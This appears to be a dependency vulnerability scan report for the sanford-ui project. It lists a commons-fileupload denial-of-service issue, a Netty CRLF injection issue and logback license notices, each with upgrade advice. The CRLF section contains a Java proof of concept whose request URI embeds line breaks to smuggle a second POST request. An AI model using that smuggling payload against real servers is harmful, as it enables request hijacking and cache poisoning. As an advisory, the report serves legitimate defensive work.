Vulnerabilities

 2 via 5 paths

Dependencies

 177

Source

 GitHub

Commit

 6e9f180c

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Issue type
  • 2
  • 2
Severity
  • 1
  • 3
Status
  • 4
  • 0
  • 0

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: commons-fileupload:commons-fileupload
  • Introduced through: org.springframework.cloud:spring-cloud-starter-openfeign@5.0.0

Detailed paths

  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.cloud:spring-cloud-starter-openfeign@5.0.0 org.springframework.cloud:spring-cloud-openfeign-core@5.0.0 io.github.openfeign:feign-form-spring@13.6 commons-fileupload:commons-fileupload@1.5

Overview

commons-fileupload:commons-fileupload is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when processing multipart headers. An attacker can exhaust system resources by sending malicious requests with excessively large individual multipart headers.

Remediation

Upgrade commons-fileupload:commons-fileupload to version 1.6.0 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity

CRLF Injection

  • Vulnerable module: io.netty:netty-codec-http
  • Introduced through: org.springframework.boot:spring-boot-starter-webflux@4.0.1

Detailed paths

  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.0.1 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.1 org.springframework.boot:spring-boot-reactor-netty@4.0.1 io.projectreactor.netty:reactor-netty-http@1.3.1 io.netty:netty-codec-http@4.2.7.Final
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.0.1 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.1 org.springframework.boot:spring-boot-reactor-netty@4.0.1 io.projectreactor.netty:reactor-netty-http@1.3.1 io.netty:netty-codec-http2@4.2.7.Final io.netty:netty-codec-http@4.2.7.Final
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.0.1 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.1 org.springframework.boot:spring-boot-reactor-netty@4.0.1 io.projectreactor.netty:reactor-netty-http@1.3.1 io.netty:netty-codec-http3@4.2.7.Final io.netty:netty-codec-http@4.2.7.Final
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.0.1 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.1 org.springframework.boot:spring-boot-reactor-netty@4.0.1 io.projectreactor.netty:reactor-netty-http@1.3.1 io.projectreactor.netty:reactor-netty-core@1.3.1 io.netty:netty-handler-proxy@4.2.7.Final io.netty:netty-codec-http@4.2.7.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to CRLF Injection in HttpRequestEncoder, due to improper sanitization of a URI with line-breaks in the DefaultHttpRequest class. An attacker can manipulate HTTP requests to cause parser desynchronization, request smuggling, and response splitting by including line break characters in requests.

PoC


public static void main(String[] args) {

  EmbeddedChannel client = new EmbeddedChannel();
  client.pipeline().addLast(new HttpClientCodec());

  EmbeddedChannel server = new EmbeddedChannel();
  server.pipeline().addLast(new HttpServerCodec());
  server.pipeline().addLast(new ChannelInboundHandlerAdapter() {
    @Override
    public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
      System.out.println("Processing msg " + msg);
    }
  });

  DefaultHttpRequest request = new DefaultHttpRequest(
    HttpVersion.HTTP_1_1,
    HttpMethod.GET,
    "/s1 HTTP/1.1\r\n" +
      "\r\n" +
      "POST /s2 HTTP/1.1\r\n" +
      "content-length: 11\r\n\r\n" +
      "Hello World" +
      "GET /s1"
  );
  client.writeAndFlush(request);
  ByteBuf tmp;
  while ((tmp = client.readOutbound()) != null) {
    server.writeInbound(tmp);
  }
}

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.129.Final, 4.2.8.Final or higher.

References

CRLF Injection vulnerability report

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-classic
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@4.0.1, org.springframework.boot:spring-boot-starter-webflux@4.0.1 and others

Detailed paths

  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-actuator@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.0.3 org.springframework.boot:spring-boot-starter-webmvc@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-actuator@4.0.1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.cloud:spring-cloud-starter-openfeign@5.0.0 org.springframework.cloud:spring-cloud-starter@5.0.0 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.0.1 org.springframework.boot:spring-boot-starter-jackson@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.0.1 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.0.3 org.springframework.boot:spring-boot-starter-webmvc@4.0.1 org.springframework.boot:spring-boot-starter-jackson@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.0.3 org.springframework.boot:spring-boot-starter-webmvc@4.0.1 org.springframework.boot:spring-boot-starter-tomcat@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22

Dual license: EPL-1.0, LGPL-2.1

Dual license: EPL-1.0, LGPL-2.1 vulnerability report

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-core
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@4.0.1, org.springframework.boot:spring-boot-starter-webflux@4.0.1 and others

Detailed paths

  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-actuator@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22 ch.qos.logback:logback-core@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22 ch.qos.logback:logback-core@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.0.3 org.springframework.boot:spring-boot-starter-webmvc@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22 ch.qos.logback:logback-core@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-actuator@4.0.1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22 ch.qos.logback:logback-core@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.cloud:spring-cloud-starter-openfeign@5.0.0 org.springframework.cloud:spring-cloud-starter@5.0.0 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22 ch.qos.logback:logback-core@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.0.1 org.springframework.boot:spring-boot-starter-jackson@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22 ch.qos.logback:logback-core@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.0.1 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22 ch.qos.logback:logback-core@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.0.3 org.springframework.boot:spring-boot-starter-webmvc@4.0.1 org.springframework.boot:spring-boot-starter-jackson@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22 ch.qos.logback:logback-core@1.5.22
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.0.3 org.springframework.boot:spring-boot-starter-webmvc@4.0.1 org.springframework.boot:spring-boot-starter-tomcat@4.0.1 org.springframework.boot:spring-boot-starter@4.0.1 org.springframework.boot:spring-boot-starter-logging@4.0.1 ch.qos.logback:logback-classic@1.5.22 ch.qos.logback:logback-core@1.5.22

Dual license: EPL-1.0, LGPL-2.1

Dual license: EPL-1.0, LGPL-2.1 vulnerability report